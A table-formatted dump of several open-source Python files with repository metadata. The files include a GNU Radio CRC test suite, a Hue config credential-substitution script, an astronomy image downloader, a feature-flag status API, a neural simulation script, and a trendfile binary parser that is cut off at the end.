text
stringlengths 6
947k
| repo_name
stringlengths 5
100
| path
stringlengths 4
231
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 6
947k
| score
float64 0
0.34
|
---|---|---|---|---|---|---|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright 2022 Daniel Estevez <daniel@destevez.net>
#
# This file is part of gr-satellites
#
# SPDX-License-Identifier: GPL-3.0-or-later
#
from gnuradio import gr, blocks, gr_unittest
import numpy as np
import pmt
# bootstrap satellites module, even from build dir
try:
import python as satellites
except ImportError:
pass
else:
import sys
sys.modules['satellites'] = satellites
from satellites import crc, crc_append, crc_check
class qa_crc(gr_unittest.TestCase):
def setUp(self):
"""Common part of all CRC tests
Creates a flowgraph, a Message Debug block, and a PDU
containing the numbers 0x00 through 0x0F.
"""
self.tb = gr.top_block()
self.dbg = blocks.message_debug()
self.data = list(range(16))
self.pdu = pmt.cons(pmt.PMT_NIL,
pmt.init_u8vector(len(self.data), self.data))
def run_crc_append(self, crc_params, crc_result):
"""Common part of CRC Append tests
Creates a CRC Append block with the specified crc_params parameters,
connects it to the Message Debug block, sends a test PDU to the
CRC Append block, and checks that the output PDU matches the expected
crc_result.
"""
crc_append_block = crc_append(*crc_params)
self.tb.msg_connect((crc_append_block, 'out'), (self.dbg, 'store'))
crc_append_block.to_basic_block()._post(pmt.intern('in'), self.pdu)
crc_append_block.to_basic_block()._post(
pmt.intern('system'),
pmt.cons(pmt.intern('done'), pmt.from_long(1)))
self.tb.start()
self.tb.wait()
self.assertEqual(self.dbg.num_messages(), 1)
out = pmt.u8vector_elements(pmt.cdr(self.dbg.get_message(0)))
self.assertEqual(out[:len(self.data)], self.data)
self.assertEqual(out[len(self.data):], crc_result)
def common_test_crc_check(self, matching_crc, header_bytes=0):
"""Common part of CRC Check tests
Creates a CRC Append block and a CRC Check block using either the
same CRC or a different one depending on the whether matching_crc
is True or False. Connects CRC Append -> CRC Check -> Message Debug
and sends a PDU through. There are two message debugs to allow
checking whether the PDU ended up in the ok or fail port of the
CRC Check block.
"""
crc_append_block = crc_append(
16, 0x1021, 0x0, 0x0, False, False, False, header_bytes)
x = 0x0 if matching_crc else 0xFFFF
crc_check_block = crc_check(
16, 0x1021, x, x, False, False, False, True, header_bytes)
self.dbg_fail = blocks.message_debug()
self.tb.msg_connect((crc_append_block, 'out'), (crc_check_block, 'in'))
self.tb.msg_connect((crc_check_block, 'ok'), (self.dbg, 'store'))
self.tb.msg_connect((crc_check_block, 'fail'),
(self.dbg_fail, 'store'))
crc_append_block.to_basic_block()._post(pmt.intern('in'), self.pdu)
crc_append_block.to_basic_block()._post(
pmt.intern('system'),
pmt.cons(pmt.intern('done'), pmt.from_long(1)))
self.tb.start()
self.tb.wait()
def test_crc_check(self):
"""Test a successful CRC check
Checks that the PDU ends in the ok port of CRC check
"""
self.common_test_crc_check(matching_crc=True)
self.assertEqual(self.dbg.num_messages(), 1)
out = pmt.u8vector_elements(pmt.cdr(self.dbg.get_message(0)))
self.assertEqual(out, self.data)
self.assertEqual(self.dbg_fail.num_messages(), 0)
def test_crc_check_header_bytes(self):
"""Test a successful CRC check (skipping some header bytes)
Checks that the PDU ends in the ok port of CRC check
"""
self.common_test_crc_check(matching_crc=True, header_bytes=5)
self.assertEqual(self.dbg.num_messages(), 1)
out = pmt.u8vector_elements(pmt.cdr(self.dbg.get_message(0)))
self.assertEqual(out, self.data)
self.assertEqual(self.dbg_fail.num_messages(), 0)
def test_crc_check_wrong_crc(self):
"""Test a failed CRC check
Checks that the PDU ends in the fail port of CRC check
"""
self.common_test_crc_check(matching_crc=False)
self.assertEqual(self.dbg.num_messages(), 0)
self.assertEqual(self.dbg_fail.num_messages(), 1)
out = pmt.u8vector_elements(pmt.cdr(self.dbg_fail.get_message(0)))
self.assertEqual(out, self.data)
def test_crc_append_crc16_ccitt_zero(self):
"""Test CRC-16-CCITT-Zero calculation"""
self.run_crc_append(
(16, 0x1021, 0x0, 0x0,
False, False, False),
[0x51, 0x3D])
def test_crc_append_crc16_ccitt_false(self):
"""Test CRC-16-CCITT-False calculation"""
self.run_crc_append(
(16, 0x1021, 0xFFFF, 0x0,
False, False, False),
[0x3B, 0x37])
def test_crc_append_crc16_ccitt_x25(self):
"""Test CRC-16-CCITT-X.25 calculation"""
self.run_crc_append(
(16, 0x1021, 0xFFFF, 0xFFFF,
True, True, False),
[0x13, 0xE9])
def test_crc_append_crc32(self):
"""Test CRC-32 calculation"""
self.run_crc_append(
(32, 0x4C11DB7, 0xFFFFFFFF, 0xFFFFFFFF,
True, True, False),
[0xCE, 0xCE, 0xE2, 0x88])
def test_crc_append_crc32c(self):
"""Test CRC-32C calculation"""
self.run_crc_append(
(32, 0x1EDC6F41, 0xFFFFFFFF, 0xFFFFFFFF,
True, True, False),
[0xD9, 0xC9, 0x08, 0xEB])
def test_crc_append_crc32c_endianness_swap(self):
"""Test CRC-32C calculation with endianness swapped"""
self.run_crc_append(
(32, 0x1EDC6F41, 0xFFFFFFFF, 0xFFFFFFFF,
True, True, True),
[0xEB, 0x08, 0xC9, 0xD9])
def test_crc_append_crc32c_skip_header_bytes(self):
"""Test CRC-32C calculation skipping some header bytes"""
skip_bytes = 3
self.run_crc_append(
(32, 0x1EDC6F41, 0xFFFFFFFF, 0xFFFFFFFF,
True, True, False, skip_bytes),
[0xE8, 0x62, 0x60, 0x68])
class qa_crc_class(gr_unittest.TestCase):
def test_crc_crc32c(self):
"""Test CRC-32C calculation (using crc class directly)"""
c = crc(32, 0x1EDC6F41, 0xFFFFFFFF, 0xFFFFFFFF, True, True)
out = c.compute(list(range(16)))
self.assertEqual(c.compute(list(range(16))),
0xD9C908EB)
if __name__ == '__main__':
gr_unittest.run(qa_crc)
gr_unittest.run(qa_crc_class)
| daniestevez/gr-satellites | python/qa_crc.py | Python | gpl-3.0 | 6,774 | 0 |
## update-hue-ini.py
##
## This script will extract the appropriate IBM Analytics for Apache Hadoop credentials from the VCAP_SERVICES
## environment variable inside a running container. It will add the username and password to the hue.ini file
## so that the hue application has access to a specific instance
import sys
import os
import json
username = None
password = None
webhdfsurl = None
srcfile = sys.argv[1]
destfile = sys.argv[2]
if "VCAP_SERVICES" in os.environ:
vcaps = json.loads(os.environ["VCAP_SERVICES"])
if "Analytics for Apache Hadoop" in vcaps:
username = vcaps["Analytics for Apache Hadoop"][0]["credentials"]["userid"]
password = vcaps["Analytics for Apache Hadoop"][0]["credentials"]["password"]
webhdfsurl = vcaps["Analytics for Apache Hadoop"][0]["credentials"]["WebhdfsUrl"]
else:
if "WEBHDFS_USER" in os.environ:
username=os.environ["WEBHDFS_USER"]
if "WEBHDFS_PASSWORD" in os.environ:
password=os.environ["WEBHDFS_PASSWORD"]
if "WEBHDFS_URL" in os.environ:
webhdfsurl=os.environ["WEBHDFS_URL"]
if (username is not None and password is not None and webhdfsurl is not None):
filedata = None
with open (srcfile,'r') as file:
filedata = file.read()
filedata = filedata.replace('%instance_user%', username)
filedata = filedata.replace('%instance_user_password%', password)
filedata = filedata.replace('%webhdfs_url%', webhdfsurl)
with open (destfile,'w') as file:
file.write(filedata)
sys.exit(0)
else:
sys.stderr.write('Fatal error: cannot find Web HDFS credentials and/or endpoint\n')
if username is None:
sys.stderr.write('username missing\n')
if password is None:
sys.stderr.write('password missing\n')
if webhdfsurl is None:
sys.stderr.write('URL endpoint missing\n')
sys.exit(1)
| vmanoria/bluemix-hue-filebrowser | update-hue-ini.py | Python | gpl-2.0 | 1,829 | 0.02515 |
#! /usr/bin/env python
from urllib2 import urlopen
from urllib import urlencode
from urlparse import urlparse, urljoin
import os.path
from numpy import *
from astrometry.util.file import *
from astrometry.util.usnob_get_image import *
from optparse import OptionParser
if __name__ == '__main__':
parser = OptionParser()
parser.add_option('-r', '--ra-low', '--ra-lo', '--ra-min',
dest='ralo', type=float, help='Minimum RA')
parser.add_option('-R', '--ra-high', '--ra-hi', '--ra-max',
dest='rahi', type=float, help='Maximum RA')
parser.add_option('-d', '--dec-low', '--dec-lo', '--dec-min',
dest='declo', type=float, help='Minimum Dec')
parser.add_option('-D', '--dec-high', '--dec-hi', '--dec-max',
dest='dechi', type=float, help='Maximum Dec')
parser.add_option('-p', '--prefix',
dest='prefix', help='Output file prefix')
parser.add_option('-s', '--survey',
dest='survey', help='Grab only one USNOB survey: poss-i, poss-ii, ... (see http://www.nofs.navy.mil/data/fchpix/cfch.html')
parser.add_option('-P', '--plate',
dest='plate', help='Grab only one USNOB plate: "se0161", for example')
parser.add_option('-c', '--continue',
dest='cont', action='store_true', help='Continue a previously interrupted transfer')
parser.set_defaults(prefix='usnob', survey=None, plate=None,
ralo=None, rahi=None, declo=None, dechi=None, cont=False)
(opt, args) = parser.parse_args()
if opt.ralo is None or opt.rahi is None or opt.declo is None or opt.dechi is None:
parser.print_help()
parser.error('RA,Dec lo,hi are required.')
radecs = []
decstep = 14./60.
Dec = arange(opt.declo, opt.dechi+decstep, decstep)
for dec in Dec:
rastep = 14./60./cos(deg2rad(dec))
RA = arange(opt.ralo , opt.rahi +rastep , rastep)
for ra in RA:
radecs.append((ra,dec))
radecs = array(radecs)
# Retrieve them in order of distance from the center of the region...
#dists = [distsq_between_radecs(r,d, (opt.ralo+opt.rahi)/2., (opt.declo+opt.dechi)/2.)
# for (r,d) in radecs]
dists = distsq_between_radecs(radecs[:,0], radecs[:,1],
(opt.ralo+opt.rahi)/2., (opt.declo+opt.dechi)/2.)
order = argsort(dists)
for (ra,dec) in radecs[order]:
(jpeg,fits) = get_usnob_images(ra, dec, fits=True, survey=opt.survey, justurls=True)
print 'got jpeg urls:', jpeg
print 'got fits urls:', fits
if opt.plate is None:
keepjpeg = jpeg
keepfits = fits
else:
keepjpeg = [u for u in jpeg if opt.plate in u]
keepfits = [u for u in fits if opt.plate in u]
print 'keep jpeg urls:', keepjpeg
print 'keep fits urls:', keepfits
base = opt.prefix + '-%.3f-%.3f-' % (ra,dec)
for url in keepjpeg:
# like "fchlwFxSl_so0194.000.jpg"
urlfn = url.split('/')[-1]
urlfn = urlfn.split('_')[-1]
fn = base + urlfn
if opt.cont and os.path.exists(fn):
print 'File', fn, 'exists.'
continue
print 'retrieving', url, 'to', fn
res = urlopen(url)
write_file(res.read(), fn)
for url in keepfits:
urlfn = url.split('/')[-1]
urlfn = urlfn.split('_')[-1]
fn = base + urlfn + '.fits'
if opt.cont and os.path.exists(fn):
print 'File', fn, 'exists.'
continue
print 'retrieving', url, 'to', fn
res = urlopen(url)
write_file(res.read(), fn)
| blackball/an-test6 | util/usnob_get_region.py | Python | gpl-2.0 | 3,265 | 0.033691 |
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from infra_libs.infra_types.infra_types import freeze
from infra_libs.infra_types.infra_types import thaw
from infra_libs.infra_types.infra_types import FrozenDict
| endlessm/chromium-browser | tools/swarming_client/third_party/infra_libs/infra_types/__init__.py | Python | bsd-3-clause | 327 | 0 |
import time
def check_vertical(matrix):
max_product = 0
for row in xrange(0, len(matrix)-3):
for col in xrange(0, len(matrix)):
product = matrix[row][col] * matrix[row+1][col] * matrix[row+2][col] * matrix[row+3][col]
max_product = max(product, max_product)
return max_product
def check_horizontal(matrix):
max_product = 0
for row in xrange(0, len(matrix)):
for col in xrange(0, len(matrix)-3):
product = reduce(lambda x,y: x*y, matrix[row][col:col+3])
max_product = max(product, max_product)
return max_product
def check_left_diagonal(matrix):
max_product = 0
for row in xrange(0, len(matrix)-3):
for col in xrange(0, len(matrix)-3):
product = matrix[row][col] * matrix[row+1][col+1] * matrix[row+2][col+2] * matrix[row+3][col+3]
max_product = max(product, max_product)
return max_product
def check_right_diagonal(matrix):
max_product = 0
for row in xrange(0, len(matrix)-3):
for col in xrange(0, len(matrix)-3):
product = matrix[row+3][col] * matrix[row+2][col+1] * matrix[row+1][col+2] * matrix[row][col+3]
max_product = max(product, max_product)
return max_product
def main():
with open("011.txt", "r") as f:
# Read the matrix from the text file, and store in an integet 2-dimensional array
matrix = []
for line in f.readlines():
matrix.append([int(num) for num in line.split(" ")])
# print matrix
# Check the matrix along the various directions, and find the max product of four adjacent numbers
print("The result is %d." % max(check_vertical(matrix), check_horizontal(matrix), check_left_diagonal(matrix), check_right_diagonal(matrix)))
if __name__ == '__main__':
start = time.time()
main()
done = time.time()
print("The solution took %.4f seconds to compute." % (done - start)) | CianciuStyles/project-euler | 011.py | Python | mit | 1,763 | 0.028361 |
# The MIT License (MIT)
#
# Copyright (c) 2014 Steve Milner
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""
Status API for flags.
"""
import json
from werkzeug.wrappers import Request, Response
from werkzeug.routing import Map, Rule
from werkzeug.exceptions import HTTPException, NotFound
from flagon.errors import UnknownFeatureError
class FlagonStatusAPI(object):
"""
Simple Flag status read-only REST api.
"""
_url_map = Map([
Rule('/v0/<flag>', endpoint='flag_status')
])
def __init__(self, backend):
"""
Creates the API object. Requires a pre-configured backend.
"""
self._backend = backend
def wsgi_app(self, environ, start_response):
"""
The WSGI App entry point.
"""
request = Request(environ)
response = self.dispatch_request(request)
return response(environ, start_response)
def dispatch_request(self, request):
"""
Dispatcher for requests. Usees the _url_map to find the
proper view to call.
"""
adapter = self._url_map.bind_to_environ(request.environ)
try:
endpoint, values = adapter.match()
return getattr(self, endpoint)(request, **values)
except HTTPException, e:
return e
def __call__(self, environ, start_response):
"""
Callable interface which forwards to wsgi_app.
"""
return self.wsgi_app(environ, start_response)
# VIEWS
def flag_status(self, request, flag):
response = Response(content_type='application/json')
response.headers.add_header(
'Cache-Control', 'no-cache, no-store, must-revalidate')
try:
active = self._backend.is_active(flag)
response.data = json.dumps({
'active': bool(active), 'known': True})
response.status_code = 200
return response
except UnknownFeatureError:
response.data = json.dumps({
'active': False, 'known': False})
response.status_code = 404
return response
def run_local_test_server(backend):
"""
Runs a local test server using the given backend/
"""
from werkzeug.serving import run_simple
run_simple('127.0.0.1', 5000, FlagonStatusAPI(backend))
| pombredanne/flagon | src/flagon/status_api/__init__.py | Python | mit | 3,360 | 0 |
'''Main simulation run: Simulation of a stationary bump.'''
from __future__ import absolute_import, print_function, division
from numpy.random import choice
from nest.hl_api import NESTError
from grid_cell_model.models.parameters import getOptParser
from grid_cell_model.models.gc_net_nest import BasicGridCellNetwork
from grid_cell_model.models.seeds import TrialSeedGenerator
from grid_cell_model.parameters.data_sets import DictDataSet
from grid_cell_model.visitors.spikes import SpikeStatsVisitor
from grid_cell_model.visitors.signals import AutoCorrelationVisitor
from simtools.storage import DataStorage
def signal_analysis(data):
'''Run the signal analysis visitors on a single data trial.
Parameters
----------
data : dict
A dictionary containing data of one trial.
Returns
-------
data : dict
Input data modified in-situ.
'''
monName = 'stateMonF_e'
stateList = ['I_clamp_GABA_A']
dummy_data_set = DictDataSet(data)
stats_visitor_e = SpikeStatsVisitor("spikeMon_e", forceUpdate=False)
ac_visitor = AutoCorrelationVisitor(monName, stateList, forceUpdate=False)
stats_visitor_e.visitDictDataSet(dummy_data_set)
ac_visitor.visitDictDataSet(dummy_data_set)
# Clean the state monitor
data['stateMonF_e'] = [data['stateMonF_e'][0]]
return data
parser = getOptParser()
(options, args) = parser.parse_args()
output_fname = "{0}/{1}job{2:05}_output.h5".format(options.output_dir,
options.fileNamePrefix,
options.job_num)
d = DataStorage.open(output_fname, 'a')
if "trials" not in d.keys():
d['trials'] = []
seed_gen = TrialSeedGenerator(int(options.master_seed))
overalT = 0.
###############################################################################
for trial_idx in range(len(d['trials']), options.ntrials):
print("\n\t\tStarting trial no. {0}\n".format(trial_idx))
seed_gen.set_generators(trial_idx)
d['master_seed'] = int(options.master_seed)
d['invalidated'] = 1
try:
ei_net = BasicGridCellNetwork(options, simulationOpts=None)
const_v = [0.0, 0.0]
ei_net.setConstantVelocityCurrent_e(const_v)
stateRecF_e = choice(ei_net.E_pop, options.gammaNSample, replace=False)
stateRecF_i = choice(ei_net.I_pop, options.gammaNSample, replace=False)
stateMonF_e_params = {
'withtime': False,
'interval': options.sim_dt * 10,
'record_from': ['I_clamp_GABA_A']
}
stateMonF_e = ei_net.getGenericStateMonitor(stateRecF_e,
stateMonF_e_params,
'stateMonF_e')
d['net_params'] = ei_net.getNetParams() # Common settings will stay
d.flush()
ei_net.simulate(options.time, printTime=options.printTime)
ei_net.endSimulation()
d['trials'].append(signal_analysis(ei_net.getAllData()))
d.flush()
constrT, simT, totalT = ei_net.printTimes()
overalT += totalT
except NESTError as e:
print("Simulation interrupted. Message: {0}".format(str(e)))
print("Trying to save the simulated data if possible...")
break
d.close()
print("Script total run time: {0} s".format(overalT))
###############################################################################
| MattNolanLab/ei-attractor | grid_cell_model/simulations/common/simulation_stationary.py | Python | gpl-3.0 | 3,476 | 0.000575 |
import pytest
import os
import shutil
import core
virtuallinks = core.import_package('virtuallinks')
def setup_function(function):
shutil.rmtree('temporary', ignore_errors=True)
os.mkdir('temporary')
os.chdir('temporary')
def teardown_function(function):
os.chdir('..')
shutil.rmtree('temporary', ignore_errors=True)
def test_unmonitor_fail():
with pytest.raises(KeyError):
virtuallinks.unmonitor('open')
def test_monitor_double_unmonitor():
assert virtuallinks.nregistered() == 0
virtuallinks.monitor('open')
virtuallinks.monitor('open')
virtuallinks.unmonitor('open')
assert virtuallinks.nregistered() == 0
def test_monitor_unmonitor_double():
assert virtuallinks.nregistered() == 0
virtuallinks.monitor('open')
assert virtuallinks.nregistered() == 1
virtuallinks.unmonitor('open')
assert virtuallinks.nregistered() == 0
virtuallinks.monitor('open')
assert virtuallinks.nregistered() == 1
virtuallinks.unmonitor('open')
assert virtuallinks.nregistered() == 0
def test_monitor_after_inspector(capsys):
virtuallinks.enable_inspector()
virtuallinks.monitor('open')
out, err = capsys.readouterr()
assert out == ''
assert err == ''
virtuallinks.unmonitor('open')
virtuallinks.disable_inspector()
def _test_monitor_inspector_interleaved_0(capsys):
virtuallinks.monitor('open')
virtuallinks.enable_inspector()
virtuallinks.unmonitor('open')
virtuallinks.disable_inspector()
with open('file.txt', 'w') as f:
f.write('')
assert os.path.exists('file.txt')
assert os.path.isfile('file.txt')
def test_monitor_inspector_interleaved_1(capsys):
virtuallinks.monitor('open')
virtuallinks.enable_inspector()
virtuallinks.unmonitor('open')
with open('file.txt', 'w') as f:
f.write('')
virtuallinks.disable_inspector()
assert os.path.exists('file.txt')
assert os.path.isfile('file.txt')
def test_monitor_inspector_interleaved_2(capsys):
virtuallinks.monitor('open')
virtuallinks.enable_inspector()
with open('file.txt', 'w') as f:
f.write('')
virtuallinks.unmonitor('open')
virtuallinks.disable_inspector()
assert os.path.exists('file.txt')
assert os.path.isfile('file.txt')
def test_monitor_inspector_interleaved_3(capsys):
virtuallinks.monitor('open')
with open('file.txt', 'w') as f:
f.write('')
virtuallinks.enable_inspector()
virtuallinks.unmonitor('open')
virtuallinks.disable_inspector()
assert os.path.exists('file.txt')
assert os.path.isfile('file.txt')
virtuallinks.unmonitor_all()
virtuallinks.unlink_all()
| ffunenga/virtuallinks | tests/core/test_installing.py | Python | mit | 2,693 | 0 |
#!/usr/bin/env python
# encoding: utf-8
"""
trend.datasource.trendfile.py
Handling and parsing of trendfiles (*.hdb)
Copyright (C) 2016/2017 Stefan Braun
This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 2 of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.
You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import ctypes
import os
import datetime
import calendar
from trend.datasource.dbdata import HighLevelDBData as DBData
from trend.datasource.dbdata import HighLevelDBData2 as DBData2
import configparser
import string
import re
import collections
import misc.timezone as timezone
import itertools
from operator import itemgetter
DEBUGGING = True
class DBData_Timestamp_Search_Result(object):
"""
contains lists of DBData elements after search for a specific point of time:
-exact: elements with equal timestamps
if "exact"-list is empty, then these lists help to calculate values in between:
-before: elements with same timestamps before point of time
-after: elements with same timestamps after point of time
"""
def __init__(self):
self.before_list = []
self.exact_list = []
self.after_list = []
def set_before(self, before_list):
self.before_list = before_list
def set_exact(self, exact_list):
self.exact_list = exact_list
def set_after(self, after_list):
self.after_list = after_list
def get_trendfile_structure_obj(file_fullpath):
"""
returns appropriate structure for accessing all DBData elements
(ctypes.Structure doesn't allow unknown amounts of elements)
"""
DMSDP_NOF_BYTES = 83 # based on observations made in class "PDBSData" (pdbsdata.py)
TRENDDATA_OFFSET = 1024 # based ob reverse engineering *.hdb file format
filesize = os.path.getsize(file_fullpath)
# DBData could be ProMoS NT(c) version 1.x or version 2 =>choosing right version
# trendfiles v1.x ends with ".hdb" , v2.x ends with ".hdbx"
file_ext = file_fullpath.split('.')[-1]
if file_ext.upper() == u'HDB':
# using ProMoS NT(c) version 1.x
curr_DBData_class = DBData
else:
# using ProMoS NT(c) version 2.x
curr_DBData_class = DBData2
nof_dbdata_elems = (filesize - TRENDDATA_OFFSET) / ctypes.sizeof(curr_DBData_class)
class Trendfile_structure(ctypes.LittleEndianStructure):
"""
Header contains DMS datapoint name,
data section contains all DBData elements, amount depends on filesize...
"""
# contains some hints from http://stackoverflow.com/questions/18536182/parsing-binary-data-into-ctypes-structure-object-via-readinto
_fields_ = [
("dmsDatapoint", ctypes.c_char * DMSDP_NOF_BYTES), # DMS datapoint name
("UNKNOWN_BYTES", ctypes.c_char * (TRENDDATA_OFFSET - DMSDP_NOF_BYTES)), # perhaps unused
("dbdata", curr_DBData_class * nof_dbdata_elems) # array of DBData elements
]
# return an instance to caller
return Trendfile_structure()
class RawTrendfile(object):
def __init__(self, fileFullpath):
self._fileFullpath = fileFullpath
self._trendstruct = get_trendfile_structure_obj(self._fileFullpath)
self._parseFile_()
def _parseFile_(self):
# reading binary trendfile into ctypes structure
# contains hints from http://stackoverflow.com/questions/18536182/parsing-binary-data-into-ctypes-structure-object-via-readinto
with open(self._fileFullpath, "rb") as f:
f.readinto(self._trendstruct)
def get_dms_Datapoint(self):
return self._trendstruct.dmsDatapoint
def get_nof_dbdata_elements(self):
return len(self._trendstruct.dbdata)
def get_first_timestamp(self):
return self._trendstruct.dbdata[0].get_datetime()
def get_last_timestamp(self):
return self._trendstruct.dbdata[-1].get_datetime()
def get_dbdata_elements_generator(self, start_datetime=None, end_datetime=None):
"""
a generator for memory efficient retrieving DBData elements
(caller can only loop once through generator,
read here: http://stackoverflow.com/questions/231767/what-does-the-yield-keyword-do-in-python )
=>optional arguments allows filtering of DBData elements
"""
# FIXME: implement some filtering (same as in "trendfile.py.old"?) Or is further filtering done in HighLevelTrendfile?
for elem in self._trendstruct.dbdata:
ignore = False
if start_datetime:
if elem.get_datetime() < start_datetime:
ignore = True
if end_datetime:
if elem.get_datetime() > end_datetime:
ignore = True
if not ignore:
yield elem
def get_dbdata_elements_as_set(self):
"""
returns DBData elements in a set()
"""
# FIXME: should we improve this code? How can we get good performance in Megabytes of trenddata?
# FIXME: Should we save the set() for next function execution, or does we allow altering of trenddata in-memory?
return set(self._trendstruct.dbdata)
def get_DBData_Timestamp_Search_Result(self, timestamp_datetime):
"""
returns an instance of DBData_Timestamp_Search_Result according to given timestamp
"""
# FIXME: method works as expected, but we should find a cleaner solution...
search_result = DBData_Timestamp_Search_Result()
# begin and end indeces of three lists don't overlap: [before_begin, ..., before_end] [exact_begin, ..., exact_end] [after_begin, ..., after_end]
# based on examples from https://docs.python.org/2/library/bisect.html
idx_bisect_left = self._get_bisect_left(timestamp_datetime)
# based on example: "Locate the leftmost value exactly equal to x"
# =>collecting all DBData elements with given timestamp
if idx_bisect_left == len(self._trendstruct.dbdata):
# special case: timestamp is higher than highest DBData-timestamp
# =>do workaround: taking last element and continue processing...
curr_elem = self._trendstruct.dbdata[-1]
else:
curr_elem = self._trendstruct.dbdata[idx_bisect_left]
if idx_bisect_left != len(self._trendstruct.dbdata) and curr_elem.get_datetime() == timestamp_datetime:
# we found "exact_begin"
# appending all elements with same timestamp
idx = idx_bisect_left
exact_timestamp = curr_elem.get_datetime()
while idx < len(self._trendstruct.dbdata):
curr_elem = self._trendstruct.dbdata[idx]
if curr_elem.get_datetime() == exact_timestamp:
search_result.exact_list.append(self._trendstruct.dbdata[idx])
idx = idx + 1
else:
break
else:
# no exact search hits found... =>populating list "before"
if idx_bisect_left > 0:
idx = idx_bisect_left - 1
before_timestamp = self._trendstruct.dbdata[idx].get_datetime()
while idx >= 0:
# collecting DBData elements with equal timestamps
curr_elem = self._trendstruct.dbdata[idx]
if curr_elem.get_datetime() == before_timestamp:
search_result.before_list.append(self._trendstruct.dbdata[idx])
idx = idx - 1
else:
break
# ... and populating list "after"
# based on example "Find leftmost value greater than x"
idx_bisect_right = self._get_bisect_right(timestamp_datetime)
if idx_bisect_right != len(self._trendstruct.dbdata):
idx = idx_bisect_right
after_timestamp = self._trendstruct.dbdata[idx].get_datetime()
while idx < len(self._trendstruct.dbdata):
# collecting DBData elements with equal timestamps
curr_elem = self._trendstruct.dbdata[idx]
if curr_elem.get_datetime() == after_timestamp:
search_result.after_list.append(self._trendstruct.dbdata[idx])
idx = idx + 1
else:
break
return search_result
def _get_bisect_left(self, timestamp_datetime):
"""
returns index of DBData element with exact timestamp or later
"""
# our DBData elements are sorted by timestamp
# =>we can use binary searching! There's already class "bisect" for this.
# =>problem: using "bisect" is impossible, it can't handle DBData directly...: https://docs.python.org/2/library/bisect.html
# =>now we adapt algorithm from it's source: https://hg.python.org/cpython/file/2.7/Lib/bisect.py
# Find DBData ("bisect.bisect_left()")
low = 0
high = len(self._trendstruct.dbdata)
while low < high:
mid = (low + high) // 2
if self._trendstruct.dbdata[mid].get_datetime() < timestamp_datetime:
low = mid + 1
else:
high = mid
return low
def _get_bisect_right(self, timestamp_datetime):
"""
returns index of DBData element at time point later as in given timestamp
"""
# our DBData elements are sorted by timestamp
# =>we can use binary searching! There's already class "bisect" for this.
# =>problem: using "bisect" is impossible, it can't handle DBData directly...: https://docs.python.org/2/library/bisect.html
# =>now we adapt algorithm from it's source: https://hg.python.org/cpython/file/2.7/Lib/bisect.py
# Find DBData ("bisect.bisect_right()")
low = 0
high = len(self._trendstruct.dbdata)
while low < high:
mid = (low + high) // 2
if timestamp_datetime < self._trendstruct.dbdata[mid].get_datetime():
high = mid
else:
low = mid + 1
return low
class IndexedTrendfile(RawTrendfile):
"""
enhances a trendfile with OrderedDict as index:
key: timestamp
value: list of DBData elements with same timestamp
second OrderedDict index allows retrieving of DBData-lists by its known position
==>both index dictionaries MUST have same size!!!
"""
def __init__(self, fileFullpath):
RawTrendfile.__init__(self, fileFullpath)
self._indexed_by_timestamp = collections.OrderedDict()
self._indexed_by_index = []
# some statistics over DBData items
# with help from http://stackoverflow.com/questions/10576548/python-usable-max-and-min-values
self.minValue = -float("inf")
self.maxValue = +float("inf")
self._create_index()
if DEBUGGING:
print('constructor of IndexedTrendfile(): file "' + fileFullpath + '" is ready.')
def _create_index(self):
curr_list = []
curr_timestamp = self.get_first_timestamp()
for item in self._trendstruct.dbdata:
# do some statistics, it's not much effort since we already process every item
curr_val = item.get_value_as_float
if curr_val < self.minValue:
self.minValue = curr_val
if curr_val > self.maxValue:
self.maxValue = curr_val
# append item to current list,
# when there's a new timestamp build a new list
if item.get_datetime() == curr_timestamp:
curr_list.append(item)
else:
# indexing old DBData elements
self._indexed_by_timestamp[curr_timestamp] = curr_list
self._indexed_by_index.append(curr_list)
# preparing new list
curr_list = [item]
curr_timestamp = item.get_datetime()
# indexing last element
if curr_timestamp not in self._indexed_by_timestamp:
self._indexed_by_timestamp[curr_timestamp] = curr_list
self._indexed_by_index.append(curr_list)
assert len(self._indexed_by_timestamp) == len(self._indexed_by_index), 'both indexes MUST have same size!'
def get_DBData_Timestamp_Search_Result(self, timestamp_datetime):
"""
returns an instance of DBData_Timestamp_Search_Result according to given timestamp
=>first we try to get it directly from dictionary,
alternative is binary searching.
"""
# DBData_Timestamp_Search_Result() has three lists of DBData elements:
# begin and end of three lists don't overlap because they represent three different points in time:
# [before_begin, ..., before_end] [exact_begin, ..., exact_end] [after_begin, ..., after_end]
# (based on examples from https://docs.python.org/2/library/bisect.html )
try:
# try to get it directly from dictionary
search_result = DBData_Timestamp_Search_Result()
search_result.before_list = []
search_result.exact_list = self._indexed_by_timestamp[timestamp_datetime]
search_result.after_list = []
except KeyError:
# we have to binary search...
search_result = DBData_Timestamp_Search_Result()
# =>we adapted algorithm from this source: https://hg.python.org/cpython/file/2.7/Lib/bisect.py
# Find list ("bisect.bisect_left()")
low = 0
high = len(self._indexed_by_index)
while low < high:
mid = (low + high) // 2
dbdata_list = self._indexed_by_index[mid]
